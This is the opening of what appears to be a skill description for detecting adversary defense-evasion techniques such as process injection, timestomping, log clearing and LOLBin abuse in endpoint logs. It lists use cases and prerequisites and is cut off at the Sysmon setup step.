Detecting Evasion Techniques in Endpoint Logs When to Use Use this skill when: - Hunting for adversary defense evasion techniques (MITRE ATT&CK TA0005) in endpoint telemetry - Building detection rules for common evasion methods (process injection, timestomping, log clearing) - Investigating incidents where adversaries disabled or bypassed security tools - Analyzing endpoint logs for indicators of living-off-the-land binary (LOLBin) abuse Do not use this skill for network-level evasion (use network traffic analysis) or for malware reverse engineering. Prerequisites - Sysmon installed and confi…